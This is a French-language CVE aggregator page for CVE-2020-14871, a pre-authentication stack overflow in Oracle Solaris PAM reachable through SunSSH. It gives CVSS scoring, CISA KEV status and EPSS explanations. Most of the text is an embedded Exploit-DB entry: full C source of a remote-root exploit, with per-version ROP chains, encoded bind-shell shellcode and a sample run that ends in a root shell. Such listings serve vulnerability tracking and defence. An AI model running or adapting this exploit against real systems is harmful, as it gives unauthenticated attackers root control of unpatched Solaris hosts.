English
Français
Light
Dark
System

CVEFind - Alertes CVE

Restez informé en continue
Créer un compte Ouvrez un compte Simple et Gratuit Se connecter Gérez vos alertes

CVE-2020-14871 : Détail

CVE-2020-14871

10
/
CRITICAL
Overflow
86.31%V3
Network
2020-10-21 12:04 +00:00
2024-07-17 13:42 +00:00
CVE.org
NVD

Alerte pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.
Gestion des alertes

Descriptions

Vulnerability in the Oracle Solaris product of Oracle Systems (component: Pluggable authentication module). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Solaris. Note: This CVE is not exploitable for Solaris 11.1 and later releases, and ZFSSA 8.7 and later releases, thus the CVSS Base Score is 0.0. CVSS 3.1 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).

Informations

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-787 Out-of-bounds Write
The product writes data past the end, or before the beginning, of the intended buffer.

Metrics

Metric Score Sévérité CVSS Vecteur Source
V3.1 10 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Network

The vulnerable component is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers).

Attack Complexity

This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.

User Interaction

This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component.

None

The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics

The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope.

Scope

Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs.

Changed

An exploited vulnerability can affect resources beyond the security scope managed by the security authority of the vulnerable component. In this case, the vulnerable component and the impacted component are different and managed by different security authorities.

Base: Impact Metrics

The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

High

There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability.

Environmental Metrics

These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

CISA KEV (Vulnérabilités Exploitées Connues)

Nom de la vulnérabilité : Oracle Solaris and Zettabyte File System (ZFS) Unspecified Vulnerability

Action requise : Apply updates per vendor instructions.

Connu pour être utilisé dans des campagnes de ransomware : Unknown

Ajouter le : 2021-11-02 23:00 +00:00

Action attendue : 2022-05-02 22:00 +00:00

Informations importantes

Ce CVE est identifié comme vulnérable et constitue une menace active, selon le Catalogue des Vulnérabilités Exploitées Connues (CISA KEV). La CISA a répertorié cette vulnérabilité comme étant activement exploitée par des cybercriminels, soulignant ainsi l'importance de prendre des mesures immédiates pour remédier à cette faille. Il est impératif de prioriser la mise à jour et la correction de ce CVE afin de protéger les systèmes contre les potentielles cyberattaques.

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

EPSS Score

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

EPSS Percentile

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 49261

Date de publication : 2020-12-14 23:00 +00:00
Auteur : Hacker Fantastic
EDB Vérifié : No

# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root # Exploit Author: Hacker Fantastic # Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris11-overview.html # Version: 11 # Tested on: SunOS solaris 5.11 11.0 /* SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871 * ==================================================================== * Makefile * all: hfsunsshdx * * hfsunsshdx: main.c * gcc main.c -o hfsunsshdx -lssh2 * * clean: * rm -rf hfsunsshdx * rm -rf core.* * * A trivial to reach stack-based buffer overflow is present in libpam on * Solaris. The vulnerable code exists in pam_framework.c parse_user_name() * which allocates a fixed size buffer of 512 bytes on the stack and parses * usernames into the buffer via modules (authtok_get) without bounds checks. * This issue can be reached remotely pre-authentication via SunSSH when * "keyboard-interactive" is enabled to use PAM based authentication. The * vulnerability was discovered being actively exploited by FireEye in the * wild and is part of an APT toolkit called "EVILSUN". The vulnerability * is present in both SPARC/x86 versions of Solaris & others (eg. illumos). * This exploit uses ROP gadgets to disable nxstack through mprotect on x86 * and a helper shellcode stub. The configuration in a default Solaris * install is vulnerable. The exploit makes use of libssh2 and tested on * Solaris 10 through 11.0. Solaris 9 does not ship with a vulnerable * SunSSH implementation and versions later than 11.1 have updated SunSSH * code that prevents the issue being triggered. * * e.g. * ./hfsunsshdx -s 192.168.11.220 -t 0 -x 2 * [+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871 * [-] chosen target 'Solaris 11 11/11 11.0 Sun_SSH_2.0 x86' * [-] using shellcode 'Solaris 11.0 x86 bindshell tcp port 9999' 193 bytes * [+] ssh host fingerprint: 01bc34fe8092e051716b91fd88eed210db2df49e * [+] entering keyboard-interactive authentication. * [-] number of prompts: 1 * [-] prompt 0 from server: 'Please enter user name: ' * [-] shellcode length 193 bytes * [-] rop chain length 68 * [-] exploit buffer length 580 * [-] sending exploit magic buffer... wait * [+] exploit success, handling payload... * [-] connected.. enjoy :) * SunOS solaris 5.11 11.0 i86pc i386 i86pc * 6:49pm up 53 min(s), 1 user, load average: 0.01, 0.01, 0.01 * helpdesk console Nov 27 17:57 * uid=0(root) gid=0(root) * * -- Hacker Fantastic (https://hacker.house) */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <errno.h> #include <ctype.h> #include <getopt.h> #include <time.h> #include <signal.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <sys/select.h> #include <arpa/inet.h> #include <sys/time.h> #include <libssh2.h> int sd = -1; int oldsd = -1; int ishell = -1; char* buf; char* payload; char* retaddr; struct sockaddr_in sain; struct target { char* name; char* ropchain; }; struct shellcode { char* name; char* shellcode; }; void spawn_shell(int); void bindshell_setup(short); void on_alarm(int); void on_interupt(int); void prepare_payload(); const int targetno = 5; struct target targets[] = { {"Solaris 11 11/11 11.0 Sun_SSH_2.0 x86", "\x41\x42\x43\x44" // %ebx "\x45\x46\x47\x48" // %esi "\x50\x51\x52\x53" // %ebp "\xa7\x0e\x06\x08" // pop %ecx, pop %edx, pop %ebp "\x9c\x3e\x04\x08" // ptr to (0x?, 0x?, 0x8044cf0, 0x7) "\x01\x01\x04\x08" // %edx unused, must be writeable addr "\x41\x42\x43\x44" // %ebp unused var "\x93\xdb\xc8\xfe" // pop %edx ; ret "\x01\x30\x04\x08" // ptr to 0x08043001 mprotect arg "\x1a\xe7\x0b\xfe" // dec %edx ; ret "\x79\x41\xfe\xfe" // mov %edx,$0x4(%ecx) ; xor %eax, %eax ; ret "\x93\xdb\xc8\xfe" // pop %edx ; ret "\x01\x30\x04\x08" // ptr to shellcode "\xe0\xe8\x3e\xfe" // mov $0x72,%al "\x64\x7c\xc3\xfe" // inc %eax ; ret "\x64\x7c\xc3\xfe" // inc %eax ; ret "\x22\x9d\xd3\xfe"},// sysenter {"Solaris 11 Express (snv_151a) Sun_SSH_1.5 x86", "\x41\x42\x43\x44" // %ebx overwrite unused "\x41\x42\x43\x44" // %esi overwrite unused "\xf8\x32\x04\x08" // %ebp overwrite unused "\xb7\xf9\x05\x08" // pop %ecx ; pop %edx ; pop %ebp ; ret "\x7e\x36\x02\x04" // ptr/2 to (0x?, 0x0, 0x1000, 0x7) "\x01\x30\x04\x08" // ptr for %edx "\x44\x43\x42\x41" // ptr for %ebp unused "\xe4\xd4\xde\xfe" // dec %edx ; add %ecx, %ecx ; ret "\x19\x42\xfe\xfe" // mov %edx,$0x4(%ecx) ; xor %eax, %eax; ret "\xb8\xf9\x05\x08" // pop %edx ; pop %ebp ; ret "\xeb\x30\x04\x08" // shellcode ptr for %edx "\x1c\x33\x04\x08" // %ebp & used by "leave" "\x84\x98\x51\xfe" // mov $0x82, %eax ; pop %esi ; pop %ebx ; leave ; ret "\x41\x42\x43\x44" // %esi unused "\xe0\x30\x04\x08" // shellcode ptr to %ebx "\xe8\x32\x04\x08" // ptr into %ebp "\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret "\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret "\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret "\x11\x3f\xfe\xfe" // sub $0x2,%eax ; ret "\xfe\xf8\xcf\xfe"},// sysenter {"Solaris 10 1/13 (147148-26) Sun_SSH_1.1.5 x86", "\xc3\x31\x04\x08" // overwrite %ebp unused "\xa3\x6c\xd8\xfe" // mov $0x74, %eax ; ret "\x29\x28\x07\x08" // pop %ebx ; ret "\xf0\xff\xaf\xfe" // 0x0a writen to address, unused gadget "\x08\xba\x05\x08" // pop %edx ; pop %ebp ; ret "\x01\x30\x04\x08" // %edx pointer to page "\xb8\x31\x04\x08" // unused %ebp value "\xaa\x4c\x68\xfe" // pop %ecx ; ret "\xe0\x6e\x04\x08" // ptr (0x?,0x0,0x1000,0x7) "\x61\x22\x07\x08" // dec %edx ; ret "\x8b\x2d\xfe\xfe" // mov %edx,0x4(%ecx) ; xor %eax,%eax ; ret "\xa3\x6c\xd8\xfe" // mov $0x74, %eax ; ret "\x08\xba\x05\x08" // pop %edx ; pop %ebp ; ret "\xc3\x31\x04\x08" // shellcode addr for %edx "\xc3\x31\x04\x08" // unused %ebp value "\xf6\x0d\xf4\xfe"},// sysenter, (ret into shellcode via %edx) {"Solaris 10 8/11 (147441-01) Sun_SSH_1.1.4 x86", "\xc3\x31\x04\x08" // overwrite %ebp unused "\x73\x6a\xd7\xfe" // mov $0x74, %eax ; ret "\xb1\x26\x07\x08" // pop %ebx ; ret "\xff\x01\xac\xfe" // write garbage here, unused gadget "\x98\xb9\x05\x08" // pop %edx ; pop %ebp ; ret "\xff\x2f\x04\x08" // %edx pointer to page "\xc3\x31\x04\x08" // unused %ebp value "\x57\xaa\xe4\xfe" // pop %ecx ; ret "\x94\x11\x5f\xfe" // ptr rwx (0x?,0x04b,0xe50,0x7) "\xee\x6a\x65\xfe" // inc %edx ; ret "\x9b\xc5\xc1\xfe" // mov %edx,0x4($ecx) ; xor %eax,%eax ; ret "\x73\x6a\xd7\xfe" // mov $0x74, %eax ; ret "\x86\xae\xe5\xfe" // pop %edx ; ret "\xc3\x31\x04\x08" // shellcode return address for %edx "\x66\x56\xb9\xfe"},// sysenter (ret into shellcode via %edx) {"Solaris all Sun_SSH_1.x.x debug crash target", "\x41\x42\x43\x43" // %ebp ptr "\x78\x79\x80\x81"} // %eip ptr }; const int shellno = 4; struct shellcode shellcodes[] = { {"Solaris x86 bindshell tcp port 9999", /* mprotect magic stub necessary for payloads expecting +x stack */ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9" "\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50" "\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91" /* mprotect_shellcode.S Solaris x86 mprotect(0x08044000,0x7000,0x07); ================================================================== xorl %eax, %eax xorl %ecx, %ecx movl $0x08041001, %ebx movw $0x7001, %ax movb $0x7,%cl dec %ebx dec %eax pushl %ecx pushl %eax pushl %ebx pushl %ebx movl %esp, %ecx xorl %eax, %eax movb $0x74, %al int $0x91 */ /* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=9999 -f c -e x86/xor_dynamic */ "\xeb\x23\x5b\x89\xdf\xb0\x55\xfc\xae\x75\xfd\x89\xf9\x89\xde" "\x8a\x06\x30\x07\x47\x66\x81\x3f\x2a\x95\x74\x08\x46\x80\x3e" "\x55\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x55\x69" "\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1" "\x51\x69\xfe\x03\x26\x0e\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b" "\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7" "\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51" "\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72" "\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52" "\xb1\x3a\xfe\xd7\x2a\x95"}, {"Solaris x86 bindshell tcp port 8080", /* mprotect magic stub necessary for payloads expecting +x stack */ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9" "\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50" "\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91" /* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=8080 -f c -e x86/xor_dynamic */ "\xeb\x23\x5b\x89\xdf\xb0\x9a\xfc\xae\x75\xfd\x89\xf9\x89\xde" "\x8a\x06\x30\x07\x47\x66\x81\x3f\x44\x60\x74\x08\x46\x80\x3e" "\x9a\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x9a\x69" "\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1" "\x51\x69\xfe\x03\x1e\x91\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b" "\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7" "\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51" "\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72" "\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52" "\xb1\x3a\xfe\xd7\x44\x60"}, /* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */ {"Solaris 11.0 x86 bindshell tcp port 9999", "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70" "\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89" "\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different "\xb8\x5d\x6d\x26\x15\xda\xce\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1" "\x19\x31\x42\x15\x83\xea\xfc\x03\x42\x11\xe2\xa8\x05\xd9\xcd" "\xad\xea\x4f\x8b\xd8\xf5\x67\x05\xde\x0f\x91\x9b\x1e\xbf\xf6" "\x24\x9c\x67\x08\x52\x47\x0d\x14\x34\xd7\xb8\x1a\xde\xd5\x8c" "\xfd\xe1\x0f\x86\x11\x49\xff\x66\xd2\xc5\x17\x77\x04\x7e\xb7" "\xdb\x19\x68\xc8\x0a\xe9\x81\xc9\x65\x60\x5f\x5f\x83\x25\x35" "\xa1\xcb\x3a\x1f\x22\xa4\x1c\xd9\x2a\x0a\x5d\x4a\xba\x42\x72" "\x18\x52\xf5\xa3\xbc\xcb\x6b\x35\xa3\x5b\x27\xcc\xc5\x0b\x97" "\x9f\x56\x1b\x2c\xdf\x8f"}, /* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */ {"Solaris 11.0 x86 bindshell tcp port 4444", "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70" "\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89" "\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different "\xb8\x8d\x2e\x32\x79\xd9\xe5\xd9\x74\x24\xf4\x5b\x29\xc9\xb1" "\x19\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\x78\x46\xcd\xa1" "\x7d\xab\x5b\x37\x08\x32\x6c\xe1\x0e\x4d\x85\x3f\xce\xe1\xc2" "\xc0\xcc\x1e\x83\xb6\x37\x4a\xa1\x98\xe7\xe1\xa7\x72\x05\x46" "\x41\x7d\xdf\xcc\x9e\xd5\x8f\x21\x5f\x69\xc7\xbd\x89\xd1\x47" "\x11\x86\x0f\x98\x43\x56\x25\x99\xba\xfd\xb3\x0f\x4a\x52\xae" "\xf1\x14\xad\xf8\xf2\xea\x89\x7c\xfa\xc4\xe9\x2f\x6a\x08\xc5" "\xbc\x02\x3e\x36\x21\xbb\xd0\xc1\x46\x6b\x7e\x5b\x69\xdb\xd0" "\x0a\x39\x6b\xeb\x53\x6b"} }; void spawn_shell(int sd) { #define sockbuflen 2048 int rcv; char sockbuf[sockbuflen]; fd_set readfds; memset(sockbuf,0,sockbuflen); snprintf(sockbuf,sockbuflen,"uname -a;uptime;who;id\n"); write(sd,sockbuf,strlen(sockbuf)); while (1) { FD_ZERO(&readfds); FD_SET(0,&readfds); FD_SET(sd,&readfds); select(255,&readfds,NULL,NULL,NULL); if (FD_ISSET(sd, &readfds)) { memset(sockbuf,0,sockbuflen); rcv = read(sd,sockbuf,sockbuflen); if (rcv <= 0) { printf("\e[1m\e[34m[!] connection closed by foreign host.\n\e[0m"); exit(-1); } printf("%s",sockbuf); fflush(stdout); } if(FD_ISSET(0,&readfds)) { memset(sockbuf,0,sockbuflen); read(0,sockbuf,sockbuflen); write(sd,sockbuf,strlen(sockbuf)); } } } void bindshell_setup(short port){ oldsd = sd; sd = socket(AF_INET,SOCK_STREAM,0); sain.sin_port = htons(port); if(connect(sd,(struct sockaddr*)&sain,sizeof(sain))<0){ printf("[!] fatal bind shell failed\n\e[0m"); exit(-1); } printf("[-] connected.. enjoy :)\e[0m\n"); spawn_shell(sd); } void on_alarm(int signum){ printf("[+] exploit success, handling payload...\n"); if(ishell==0||ishell==2){ bindshell_setup(9999); } if(ishell==1||ishell==3){ bindshell_setup(8080); } printf("[-] exploit complete\n\e[0m"); exit(0); } void on_interrupt(int signum){ printf("\e[1m\e[34m[!] interrupt caught... cleaning up\n\e[0m"); if(sd){ close(sd); } if(oldsd){ close(oldsd); } exit(0); } void prepare_payload(){ /* bad characters are 0x20 0x09 & 0x00 */ #define payload_size 4096 int len = strlen(payload); buf = malloc(payload_size); char randchar = 'A'; char* randbuf = malloc(2); if(!buf||!randbuf){ printf("[!] fatal payload buffer error\n"); exit(-1); } srand(time(NULL)); memset(buf,'\x00',payload_size); memset(randbuf,0,2); printf("[-] shellcode length %d bytes\n",len); if(len < 512 && payload_size > 1024){ memcpy(buf,payload,len); for(int i =0;i <= (512 - len);i++){ randchar = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"[random() % 52]; memcpy(randbuf,&randchar,1); strcat(buf,randbuf); } len = strlen(retaddr); printf("[-] rop chain length %d\n",len); if(len + 512 < payload_size){ memcpy((void*)(long)buf+512,(void*)retaddr,len); len = strlen(buf); printf("[-] exploit buffer length %d\n",len); } else{ printf("[!] exploit buffer miscalculated\n"); exit(-1); } } else{ printf("[!] exploit buffer miscalculated\n"); exit(-1); } } static void kbd_callback(const char *name, int name_len,const char *instruction, int instruction_len,int num_prompts,const LIBSSH2_USERAUTH_KBDINT_PROMPT *prompts,LIBSSH2_USERAUTH_KBDINT_RESPONSE *responses, void **abstract) { int i = 0; signal(SIGALRM, &on_alarm); printf("[+] entering keyboard-interactive authentication.\n"); printf("[-] number of prompts: %d\n", num_prompts); printf("[-] prompt %d from server: '", i); fwrite(prompts[i].text, 1, prompts[i].length, stdout); printf("'\n"); prepare_payload(); //uncomment to pause for gdb debugging //sleep(10); responses[i].text = strdup(buf); responses[i].length = strlen(buf); printf("[-] sending exploit magic buffer... wait\n"); alarm(5); } int main(int argc,char **argv){ int ihost = 0, itarg = 0, port = 22, index = 0, rc = 0; char* host; int i, type, exitcode; unsigned long hostaddr; const char *fingerprint; LIBSSH2_SESSION *session; LIBSSH2_CHANNEL *channel; char *exitsignal = (char *)"none"; size_t len; LIBSSH2_KNOWNHOSTS *nh; static struct option options[] = { {"server", 1, 0, 's'}, {"port", 1, 0, 'p'}, {"target", 1, 0, 't'}, {"shellcode", 1, 0, 'x'}, {"help", 0, 0,'h'} }; printf("\e[1m\e[34m[+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871\n"); while(rc != -1) { rc = getopt_long(argc,argv,"s:p:t:x:h",options,&index); switch(rc) { case -1: break; case 's': if(ihost==0){ host = malloc(strlen(optarg) + 1); if(host){ sprintf(host,"%s",optarg); ihost = 1; } } break; case 'p': port = atoi(optarg); break; case 'x': if(ishell==-1) { rc = atoi(optarg); switch(rc){ case 0: printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); payload = malloc(strlen(shellcodes[rc].shellcode)+1); if(payload){ memset(payload,0,strlen(shellcodes[rc].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); ishell = rc; } break; case 1: printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); payload = malloc(strlen(shellcodes[rc].shellcode)+1); if(payload){ memset(payload,0,strlen(shellcodes[rc].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); ishell = rc; } break; case 2: printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); payload = malloc(strlen(shellcodes[rc].shellcode)+1); if(payload){ memset(payload,0,strlen(shellcodes[rc].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); ishell = rc; } break; case 3: printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); payload = malloc(strlen(shellcodes[rc].shellcode)+1); if(payload){ memset(payload,0,strlen(shellcodes[rc].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); ishell = rc; } break; default: printf("[!] Invalid shellcode selection %d\n",rc); exit(0); break; } } break; case 't': if(itarg==0){ rc = atoi(optarg); switch(rc){ case 0: printf("[-] chosen target '%s'\n",targets[rc].name); retaddr = malloc(strlen(targets[rc].ropchain)+1); if(retaddr){ memset(retaddr,0,strlen(targets[rc].ropchain)+1); memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); itarg = rc; } break; case 1: printf("[-] chosen target '%s'\n",targets[rc].name); retaddr = malloc(strlen(targets[rc].ropchain)+1); if(retaddr){ memset(retaddr,0,strlen(targets[rc].ropchain)+1); memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); itarg = rc; } break; case 2: printf("[-] chosen target '%s'\n",targets[rc].name); retaddr = malloc(strlen(targets[rc].ropchain)+1); if(retaddr){ memset(retaddr,0,strlen(targets[rc].ropchain)+1); memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); itarg = rc; } break; case 3: printf("[-] chosen target '%s'\n",targets[rc].name); retaddr = malloc(strlen(targets[rc].ropchain)+1); if(retaddr){ memset(retaddr,0,strlen(targets[rc].ropchain)+1); memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); itarg = rc; } break; case 4: printf("[-] chosen target '%s'\n",targets[rc].name); retaddr = malloc(strlen(targets[rc].ropchain)+1); if(retaddr){ memset(retaddr,0,strlen(targets[rc].ropchain)+1); memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); itarg = rc; } break; default: printf("[!] Invalid target selection %d\n", rc); exit(0); break; } itarg = 1; } break; case 'h': printf("[!] Usage instructions.\n[\n"); printf("[ %s <required> (optional)\n[\n[ --server|-s <ip/hostname>\n",argv[0]); printf("[ --port|-p (port)[default 22]\n[ --target|-t <target#>\n"); printf("[ --shellcode|-x <shellcode#>\n[\n"); printf("[ Target#'s\n"); for(i = 0;i <= targetno - 1;i++){ printf("[ %d \"%s\"\n",i,targets[i]); } printf("[\n[ Shellcode#'s\n"); for(i = 0;i <= shellno - 1;i++){ printf("[ %d \"%s\" (length %d bytes)\n",i,shellcodes[i].name,strlen(shellcodes[i].shellcode)); } printf("\e[0m"); exit(0); break; default: break; } } if(itarg != 1 || ihost != 1 || ishell < 0){ printf("[!] error, insufficient arguments, try running '%s --help'\e[0m\n",argv[0]); exit(-1); } rc = libssh2_init(0); hostaddr = inet_addr(host); sd = socket(AF_INET, SOCK_STREAM, 0); sain.sin_family = AF_INET; sain.sin_port = htons(port); sain.sin_addr.s_addr = hostaddr; if(connect(sd, (struct sockaddr*)(&sain),sizeof(struct sockaddr_in)) != 0) { fprintf(stderr, "[!] failed to connect!\n"); goto shutdown; } session = libssh2_session_init(); libssh2_session_set_blocking(session, 1); while((rc = libssh2_session_handshake(session, sd))==LIBSSH2_ERROR_EAGAIN); if(rc) { printf("[!] failure establishing ssh session: %d\n", rc); goto shutdown; } nh = libssh2_knownhost_init(session); if(!nh) { printf("[!] failure on libssh2 init\n"); goto shutdown; } fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1); printf("[+] ssh host fingerprint: "); for(i = 0; i < 20; i++) { printf("%02x", (unsigned char)fingerprint[i]); } printf("\n"); libssh2_knownhost_free(nh); signal(SIGINT,&on_interrupt); libssh2_userauth_keyboard_interactive(session, "", &kbd_callback); printf("[!] exploit failed, core maybe on target!\n"); shutdown: if(sd){ close(sd); } printf("\e[0m"); return -2; }
Exploit Database EDB-ID : 49896

Date de publication : 2021-05-20 22:00 +00:00
Auteur : legend
EDB Vérifié : No

